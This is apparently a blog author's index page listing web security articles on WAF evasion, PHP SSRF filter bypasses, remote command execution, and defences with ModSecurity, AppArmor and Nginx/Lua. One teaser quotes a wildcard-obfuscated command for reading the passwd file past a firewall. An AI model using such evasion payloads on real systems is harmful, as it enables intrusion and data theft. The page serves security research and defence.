theMiddleHow To Exploit PHP Remotely To Bypass Filters & WAF RulesIn the last three articles, I’ve been focused on how to bypass WAF rule set in order to exploit a remote command execution. In this…1 min read·Jan 6, 2019----
theMiddleWeb Application Firewall (WAF) Evasion Techniques #3This article explores how to use an uninitialized Bash variable to bypass WAF regular expression based filters and pattern matching. Let’s…1 min read·Jan 6, 2019----
theMiddleDNSBL: Not just for spamUsing DNS in order to block botnet, spammers and Tor with Nginx, Lua, ModSecurity and FakeDNS1 min read·Aug 12, 2018----
theMiddleAppArmor: Say Goodbye to Remote Command Execution.How to kill RCE and RFI directly on the php-fpm process. Let’s do a test exploiting Drupalgeddon2.1 min read·Jul 3, 2018----
theMiddleBuilding A HackTheBox FluxCapacitorWhat I Learned Making This Box For HTB4 min read·May 20, 2018----
theMiddlePHP SSRF TechniquesHow to bypass filter_var(), preg_match() and parse_url()7 min read·Mar 1, 2018--8--8
theMiddleWeb Application Firewall (WAF) Evasion Techniques #2String concatenation in a Remote Command Execution payload makes you able to bypass firewall rules (Sucuri, ModSecurity)9 min read·Jan 3, 2018--6--6
theMiddleDetecting human users: Is there a way to block enumeration, fuzz or web scan?No, you won’t be able to totally block them, but you would be surprised how stupid some bots are! Nginx + Lua FTW.9 min read·Dec 27, 2017----
theMiddleWeb Application Firewall (WAF) Evasion TechniquesI can read your passwd file with: “/???/??t /???/??ss??”. Having fun with Sucuri WAF, ModSecurity, Paranoia Level and more…9 min read·Dec 8, 2017--3--3
theMiddleModSecurity + Elasticsearch + KibanaHow to store ModSecurity Audit Logs in Elasticsearch and how to make searches and reports using Kibana4 min read·Nov 14, 2017--7--7